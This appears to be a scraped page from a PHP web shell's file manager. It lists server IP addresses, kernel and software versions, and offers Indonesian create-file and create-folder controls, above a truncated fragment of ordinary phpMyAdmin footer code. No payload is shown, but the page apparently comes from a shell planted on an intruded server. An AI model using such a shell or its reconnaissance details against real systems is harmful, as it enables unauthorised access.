- Your IP: 216.73.216.172
- Server IP: 13.200.189.69
- Server: Linux ip-172-31-46-210 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
- Server Software: Apache/2.4.41 (Ubuntu)
- PHP Version: 7.4.3-4ubuntu2.29
-
Buat File |
Buat Folder
";
}
if (! $this->_isAjax && ! $this->_isMinimal) {
if (Core::getenv('SCRIPT_NAME')
&& empty($_POST)
&& ! $this->_isAjax
) {
$url = $this->getSelfUrl();
$header = Response::getInstance()->getHeader();
$scripts = $header->getScripts()->getFiles();
$menuHash = $header->getMenu()->getHash();
// prime the client-side cache
$this->_scripts->addCode(
sprintf(
'if (! (history && history.pushState)) '
. 'PMA_MicroHistory.primer = {'
. ' url: "%s",'
. ' scripts: %s,'
. ' menuHash: "%s"'
. '};',
Sanitize::escapeJsString($url),
json_encode($scripts),
Sanitize::escapeJsString($menuHash)
)
);
}
if (Core::getenv('SCRIPT_NAME')
&& ! $this->_isAjax
) {
$url = $this->getSelfUrl();
$retval .= $this->_getSelfLink($url);
}
$this->_scripts->addCode(
'var debugSQLInfo = ' . $this->getDebugMessage() . ';'
);
$retval .= '';
$retval .= $this->getErrorMessages();
$retval .= '
';
$retval .= $this->_scripts->getDisplay();
if ($GLOBALS['cfg']['DBG']['demo']) {
$retval .= '';
$retval .= $this->_getDemoMessage();
$retval .= '
';
}
$retval .= Config::renderFooter();
}
if (! $this->_isAjax) {
$retval .= "